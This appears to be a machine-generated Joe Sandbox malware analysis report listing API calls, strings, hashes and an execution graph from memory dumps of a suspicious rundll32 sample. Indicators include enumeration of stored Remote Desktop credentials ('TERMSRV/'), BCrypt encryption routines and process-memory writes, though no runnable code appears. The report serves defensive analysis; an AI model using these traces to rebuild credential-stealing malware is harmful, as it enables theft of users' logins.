                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                 • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Cred$EnumerateFree
                                                • String ID: TERMSRV/
                                                • API String ID: 3403564193-3001602198
                                                • Opcode ID: 4682d42cc4522139ac92b3ff9421caae9a4fff32d28262eb57f6c9a9dd9a68db
                                                • Instruction ID: aea31cdc397d8bd95dd6d98b262a6b98794c9639cd2037e49966c0afa778da30
                                                • Opcode Fuzzy Hash: 4682d42cc4522139ac92b3ff9421caae9a4fff32d28262eb57f6c9a9dd9a68db
                                                • Instruction Fuzzy Hash: 02219E72A60129DFCB54DFA4C8D48AEF7BAFB44318B65D46AD902A7210D3309A91CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNEL32(00000BB8,127.0.0.1,?,?,00000114), ref: 02E57DB7
                                                • PathFileExistsW.SHLWAPI(?,?), ref: 02E57DD4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                 • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePathSleep
                                                • String ID: 127.0.0.1
                                                • API String ID: 3601874461-3619153832
                                                • Opcode ID: a657da545908498cf69abf792bba46a578c96a31acf508d0be7f1ac16c5e728e
                                                • Instruction ID: 2d0f70634396202d65a658296f0b7dc3d8bd444681e32e11e25714b8787cb8a5
                                                • Opcode Fuzzy Hash: a657da545908498cf69abf792bba46a578c96a31acf508d0be7f1ac16c5e728e
                                                • Instruction Fuzzy Hash: F0F0F4316E02399BCB21AA65EC09EE7F358DB06788F489061AD02C6080DB71C5B4CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                 • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: gethostbynamewsprintf
                                                • String ID: %u.%u.%u.%u
                                                • API String ID: 3411498959-1542503432
                                                • Opcode ID: d83cedb23c7a404512858c3c37d262aad474d3e66760e5f4889d4d14878f3e1e
                                                • Instruction ID: f72f460746174c4ad06ae083703c67854451d4fa689e8e20ebdb37d9718fb339
                                                • Opcode Fuzzy Hash: d83cedb23c7a404512858c3c37d262aad474d3e66760e5f4889d4d14878f3e1e
                                                • Instruction Fuzzy Hash: BEE02B712981706F83190B5ADC1CC72BFECDF092513098095F989CB122D624C520DBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,00000000,00000000,74D65350,?,02E591A4,00000000), ref: 02E56935
                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02E591A4,00000000), ref: 02E56942
                                                • HeapAlloc.KERNEL32(00000000,?,02E591A4,00000000), ref: 02E56949
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,?,02E591A4,00000000), ref: 02E56961
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                 • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharHeapMultiWide$AllocProcess
                                                • String ID:
                                                • API String ID: 1432973188-0
                                                • Opcode ID: 1c1a9a0fb887aad5139475d3849a3a7a0481930399cc7d0745a87b0e0eede581
                                                • Instruction ID: 364717ceee5c5b14f5f2e91a4383f4db663445d550296674bd3b773614ac6cd0
                                                • Opcode Fuzzy Hash: 1c1a9a0fb887aad5139475d3849a3a7a0481930399cc7d0745a87b0e0eede581
                                                • Instruction Fuzzy Hash: 09F096B6A50228BFDB006EA49CC4C7F7B6DE7092687204635FD11E2280D6308D505B70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000), ref: 02E56CCC
                                                • HeapFree.KERNEL32(00000000), ref: 02E56CCF
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E56CDB
                                                • HeapFree.KERNEL32(00000000), ref: 02E56CDE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                 • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 6ad9e4a098a867a1b1306d449ed5581f8fd056eb18b83220c1a094022cfada03
                                                • Instruction ID: 8df1b860bb5c08637aa8154263c54ac406b5b3cdcf648a01afc53affdbd72e2d
                                                • Opcode Fuzzy Hash: 6ad9e4a098a867a1b1306d449ed5581f8fd056eb18b83220c1a094022cfada03
                                                • Instruction Fuzzy Hash: 84E0127279037867DA10AAD69DC0F57B7ACEB98655F444026EB04DB140CA60E8108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00000008,00000000,74DF0F00,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E5712E
                                                • HeapAlloc.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57131
                                                  • Part of subcall function 02E57167: EnterCriticalSection.KERNEL32(02CD5F60,74DEF380,?,02E5714E,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57178
                                                  • Part of subcall function 02E57167: LeaveCriticalSection.KERNEL32(02CD5F60,?,02E5714E,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E571B1
                                                  • Part of subcall function 02E57167: Sleep.KERNEL32(00002710,?,02E5714E,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E571C9
                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57156
                                                • HeapFree.KERNEL32(00000000,?,02E56B1A,00000001,02E56C12,00000000,?,74DF0F00), ref: 02E57159
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                 • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
                                                • String ID:
                                                • API String ID: 2739146912-0
                                                • Opcode ID: d566bb5c5b478cf8671988115e12085f8941d8a52af50096d8563d1670ee250c
                                                • Instruction ID: a81c8310489ac34c9044e1dc3b912127946bc7407600af645bf82ccbe14bbf35
                                                • Opcode Fuzzy Hash: d566bb5c5b478cf8671988115e12085f8941d8a52af50096d8563d1670ee250c
                                                • Instruction Fuzzy Hash: 00E030726903146BDB106EA69D84B17F79DEB54314F008425FA048A205CBB1D4248B30
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:17.3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.6%
                                                Total number of Nodes:1087
                                                Total number of Limit Nodes:34
                                                execution_graph 3593 7ff72e9045b4 3596 7ff72e906ad0 3593->3596 3597 7ff72e9045bd 3596->3597 3598 7ff72e906b02 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3596->3598 3598->3597 3599 7ff72e9028f4 3600 7ff72e901478 17 API calls 3599->3600 3601 7ff72e902957 3600->3601 3602 7ff72e9011dc 13 API calls 3601->3602 3609 7ff72e902a0b 3601->3609 3603 7ff72e902984 3602->3603 3604 7ff72e9011dc 13 API calls 3603->3604 3603->3609 3605 7ff72e9029b9 3604->3605 3605->3609 3610 7ff72e902a24 3605->3610 3608 7ff72e902a24 13 API calls 3608->3609 3611 7ff72e9011dc 13 API calls 3610->3611 3612 7ff72e902a66 3611->3612 3613 7ff72e9011dc 13 API calls 3612->3613 3616 7ff72e9029e2 3612->3616 3614 7ff72e902a8c 3613->3614 3615 7ff72e9011dc 13 API calls 3614->3615 3614->3616 3615->3616 3616->3608 3616->3609 3617 7ff72e905874 SetUnhandledExceptionFilter 3618 7ff72e905830 3619 7ff72e905869 3618->3619 3620 7ff72e90583f 3618->3620 3620->3619 3622 7ff72e908358 3620->3622 3627 7ff72e9052fc 3622->3627 3628 7ff72e905278 _getptd 62 API calls 3627->3628 3629 7ff72e905307 3628->3629 3630 7ff72e905317 3629->3630 3631 7ff72e905c24 _amsg_exit 62 API calls 3629->3631 3632 7ff72e90914c 3630->3632 3631->3630 3639 7ff72e9083bc DecodePointer 3632->3639 3640 7ff72e90927f 3641 7ff72e90929b 3640->3641 3642 7ff72e909291 3640->3642 3644 7ff72e90739c LeaveCriticalSection 3642->3644 3645 7ff72e9028ac 3646 7ff72e9028c5 3645->3646 3647 7ff72e9028bc LocalFree 3645->3647 3648 7ff72e9028d1 LocalFree 3646->3648 3649 7ff72e9028da 3646->3649 3647->3646 3648->3649 3650 7ff72e9028e6 FreeLibrary 3649->3650 3651 7ff72e9028ec 3649->3651 3650->3651 3661 7ff72e9021e8 RtlEqualUnicodeString 3662 7ff72e90221b __initmbctable 3661->3662 3663 7ff72e904de8 3664 7ff72e904df5 3663->3664 3665 7ff72e904dff 3663->3665 3667 7ff72e904c08 3664->3667 3668 7ff72e9052fc _getptd 62 API calls 3667->3668 3669 7ff72e904c2c 3668->3669 3691 7ff72e904844 
3669->3691 3674 7ff72e907520 __wsetargv 62 API calls 3675 7ff72e904c58 __initmbctable 3674->3675 3685 7ff72e904d9b 3675->3685 3709 7ff72e904990 3675->3709 3678 7ff72e904c93 3680 7ff72e904cb7 3678->3680 3684 7ff72e9074e0 __free_lconv_num 62 API calls 3678->3684 3679 7ff72e904d9d 3681 7ff72e904db6 3679->3681 3682 7ff72e9074e0 __free_lconv_num 62 API calls 3679->3682 3679->3685 3680->3685 3686 7ff72e90749c _lock 62 API calls 3680->3686 3683 7ff72e905810 _errno 62 API calls 3681->3683 3682->3681 3683->3685 3684->3680 3685->3665 3688 7ff72e904ce7 3686->3688 3687 7ff72e904d8a 3719 7ff72e90739c LeaveCriticalSection 3687->3719 3688->3687 3690 7ff72e9074e0 __free_lconv_num 62 API calls 3688->3690 3690->3687 3692 7ff72e9052fc _getptd 62 API calls 3691->3692 3693 7ff72e904853 3692->3693 3694 7ff72e90486e 3693->3694 3695 7ff72e90749c _lock 62 API calls 3693->3695 3696 7ff72e9048f0 3694->3696 3698 7ff72e905c24 _amsg_exit 62 API calls 3694->3698 3699 7ff72e904881 3695->3699 3702 7ff72e904900 3696->3702 3698->3696 3700 7ff72e9048b7 3699->3700 3701 7ff72e9074e0 __free_lconv_num 62 API calls 3699->3701 3720 7ff72e90739c LeaveCriticalSection 3700->3720 3701->3700 3721 7ff72e9041a8 3702->3721 3705 7ff72e904945 3707 7ff72e90494a GetACP 3705->3707 3708 7ff72e904930 3705->3708 3706 7ff72e904920 GetOEMCP 3706->3708 3707->3708 3708->3674 3708->3685 3710 7ff72e904900 __initmbctable 64 API calls 3709->3710 3711 7ff72e9049b7 3710->3711 3712 7ff72e9049bf __initmbctable 3711->3712 3713 7ff72e904a10 IsValidCodePage 3711->3713 3718 7ff72e904a36 __initmbctable 3711->3718 3714 7ff72e907270 _amsg_exit 8 API calls 3712->3714 3713->3712 3715 7ff72e904a21 GetCPInfo 3713->3715 3716 7ff72e904bf1 3714->3716 3715->3712 3715->3718 3716->3678 3716->3679 3990 7ff72e904654 GetCPInfo 3718->3990 3722 7ff72e9041ba 3721->3722 3726 7ff72e90421b 3721->3726 3723 7ff72e9052fc _getptd 62 API calls 3722->3723 3725 7ff72e9041bf 3723->3725 3724 7ff72e9041f4 3724->3726 3728 7ff72e904844 __initmbctable 62 API calls 
3724->3728 3725->3724 3729 7ff72e905114 3725->3729 3726->3705 3726->3706 3728->3726 3730 7ff72e9052fc _getptd 62 API calls 3729->3730 3731 7ff72e90511f 3730->3731 3732 7ff72e905148 3731->3732 3733 7ff72e90513a 3731->3733 3734 7ff72e90749c _lock 62 API calls 3732->3734 3735 7ff72e9052fc _getptd 62 API calls 3733->3735 3736 7ff72e905152 3734->3736 3738 7ff72e90513f 3735->3738 3743 7ff72e9050bc 3736->3743 3741 7ff72e905180 3738->3741 3742 7ff72e905c24 _amsg_exit 62 API calls 3738->3742 3741->3724 3742->3741 3744 7ff72e905106 3743->3744 3745 7ff72e9050ca _freefls _getptd 3743->3745 3747 7ff72e90739c LeaveCriticalSection 3744->3747 3745->3744 3748 7ff72e904f40 3745->3748 3749 7ff72e904f5e 3748->3749 3750 7ff72e904fd7 3748->3750 3749->3750 3753 7ff72e904f9d 3749->3753 3759 7ff72e9074e0 __free_lconv_num 62 API calls 3749->3759 3751 7ff72e9074e0 __free_lconv_num 62 API calls 3750->3751 3752 7ff72e90502a 3750->3752 3754 7ff72e904ffb 3751->3754 3760 7ff72e905057 3752->3760 3816 7ff72e9079f4 3752->3816 3757 7ff72e904fbf 3753->3757 3767 7ff72e9074e0 __free_lconv_num 62 API calls 3753->3767 3756 7ff72e9074e0 __free_lconv_num 62 API calls 3754->3756 3761 7ff72e90500f 3756->3761 3763 7ff72e9074e0 __free_lconv_num 62 API calls 3757->3763 3765 7ff72e904f91 3759->3765 3762 7ff72e9050a2 3760->3762 3772 7ff72e9074e0 62 API calls __free_lconv_num 3760->3772 3766 7ff72e9074e0 __free_lconv_num 62 API calls 3761->3766 3768 7ff72e904fcb 3763->3768 3764 7ff72e9074e0 __free_lconv_num 62 API calls 3764->3760 3776 7ff72e907e50 3765->3776 3770 7ff72e90501e 3766->3770 3771 7ff72e904fb3 3767->3771 3773 7ff72e9074e0 __free_lconv_num 62 API calls 3768->3773 3774 7ff72e9074e0 __free_lconv_num 62 API calls 3770->3774 3804 7ff72e907de4 3771->3804 3772->3760 3773->3750 3774->3752 3777 7ff72e907f54 3776->3777 3778 7ff72e907e59 3776->3778 3777->3753 3779 7ff72e907e73 3778->3779 3780 7ff72e9074e0 __free_lconv_num 62 API calls 3778->3780 3781 7ff72e907e85 3779->3781 3782 7ff72e9074e0 __free_lconv_num 62 

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: InformationLocalQuerySystem$AddressAllocFreeHandleModuleProc
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 3225137318-3502785670
                                                • Opcode ID: 94f01879200145af3739c986655f729ea8638cfc54d1f0d8c2aabe165a65a1f6
                                                • Instruction ID: c775890bf5c91ca1dd97ff5717f66a50ff04e6f15b60242181877ed420cd302d
                                                • Opcode Fuzzy Hash: 94f01879200145af3739c986655f729ea8638cfc54d1f0d8c2aabe165a65a1f6
                                                • Instruction Fuzzy Hash: 4E11B672B14A5286EB546B1AFC04228A3A1FB89BD4FD4503ADE9D43724DE3CD440CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: CurrentProcess$InformationQuery
                                                • String ID:
                                                • API String ID: 4257070689-0
                                                • Opcode ID: 24016c5670ef6a44130889d36a211bded3f85692fff664be365332c08a7ab1e6
                                                • Instruction ID: d05745f22541cb61bb9bd2941264e52902f1a5ca08ab4b5aeec74a67e0cd2bff
                                                • Opcode Fuzzy Hash: 24016c5670ef6a44130889d36a211bded3f85692fff664be365332c08a7ab1e6
                                                • Instruction Fuzzy Hash: 1231A032B04A528AEB559F96EC406BD7369FB04B88FC4003ADE8D13744DF38D855CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                • String ID: BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptEncrypt$BCryptGenerateSymmetricKey$BCryptGetProperty$BCryptOpenAlgorithmProvider$BCryptSetProperty$LoadLibraryW$bcrypt$kernel32
                                                • API String ID: 384173800-3281753865
                                                • Opcode ID: e9f0c585d2483b32f2c60ff5eea04de2183c66ce1dd5988152d4d5971df24dbe
                                                • Instruction ID: 5bd84a5ba277a5987056afdaa588339d31f8a5f9e9db565fd9ac1375b969ed22
                                                • Opcode Fuzzy Hash: e9f0c585d2483b32f2c60ff5eea04de2183c66ce1dd5988152d4d5971df24dbe
                                                • Instruction Fuzzy Hash: 7F419064D09B1788FE91AB14EC54378A3A0EF857C4FC0513FD88D96260EF7DA189DA23
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc$FileMemoryPointerProcess$ControlDeviceFreeLocalReadWrite
                                                • String ID: LocalAlloc$ReadFile$WriteFile$kernel32
                                                • API String ID: 142657384-482538141
                                                • Opcode ID: 8daf259e33ea4a93c82d00914d64b11e184bf32111c03331b56777a581bc2aae
                                                • Instruction ID: cbb58599e4538339625d3e8990aba4f799a0aaf6aa6765f152926753670b23d7
                                                • Opcode Fuzzy Hash: 8daf259e33ea4a93c82d00914d64b11e184bf32111c03331b56777a581bc2aae
                                                • Instruction Fuzzy Hash: D4714F36A08A4686EB50AF16E850279B3A0FB89F94BD4803BDACD43764DF3CD545CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: InitStringUnicode$AddressFreeHandleLocalModuleProc
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 979628613-3502785670
                                                • Opcode ID: 340a1b91e7e4e046959c71363f41b3112a23e71193b524fa197526ea187408af
                                                • Instruction ID: 4375dcaad0d75addcc41694f39c7a05bbddbe3e11138b871e43c50c28cb447b4
                                                • Opcode Fuzzy Hash: 340a1b91e7e4e046959c71363f41b3112a23e71193b524fa197526ea187408af
                                                • Instruction Fuzzy Hash: 92027176A08B4686EB50DB55E84027AB3A5FB88754FC0013AEE8D43B99EF3CD544CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: 3DES$AES$ChainingMode$ChainingModeCBC$ChainingModeCFB$LocalAlloc$ObjectLength$kernel32
                                                • API String ID: 1646373207-1761306045
                                                • Opcode ID: 9f77bb441c1b825aea171bdd8c13abe2f88182e032095ff36467865f771ed3e4
                                                • Instruction ID: a4d1befba90a0431dde4dcaf5545b16f3e60e67d6f9c4ea80bd9cb90faa4b95f
                                                • Opcode Fuzzy Hash: 9f77bb441c1b825aea171bdd8c13abe2f88182e032095ff36467865f771ed3e4
                                                • Instruction Fuzzy Hash: 86411E71A08B0786FB40AB15FC64669A360FF85798FC0103BD58D5B664EF3DE149CB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLocalModuleProc$File$Pointer$ControlCreateDeviceMemoryProcessWrite
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 1403373514-3502785670
                                                • Opcode ID: 1a827ad7871d06135c3d3f7c3b15daf385599e7e3ef9329ebfb9e2afda5a2a80
                                                • Instruction ID: 63372901662c187d0108ae1179ed11243dfa7b90d6bfb5461e95a07efb466f71
                                                • Opcode Fuzzy Hash: 1a827ad7871d06135c3d3f7c3b15daf385599e7e3ef9329ebfb9e2afda5a2a80
                                                • Instruction Fuzzy Hash: 71B10D76B09B06CAEB50EB65E8502AC73B1FB48788F80013ADE8D57758DF38E545CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: DescriptorHeapSecurity$AddressAllocCreateDaclFileHandleInitializeModuleNamedPipeProcProcessSleepWait
                                                • String ID: GetLastError$kernel32
                                                • API String ID: 2144717574-498319287
                                                • Opcode ID: d3ca0b4f129c3ff4b8e511f0660e67add134304a628778553f8f0829a689bfc9
                                                • Instruction ID: c38e371bf2eea97fd10a441d486620214ab0e8576dd5087271afce3e600e1624
                                                • Opcode Fuzzy Hash: d3ca0b4f129c3ff4b8e511f0660e67add134304a628778553f8f0829a689bfc9
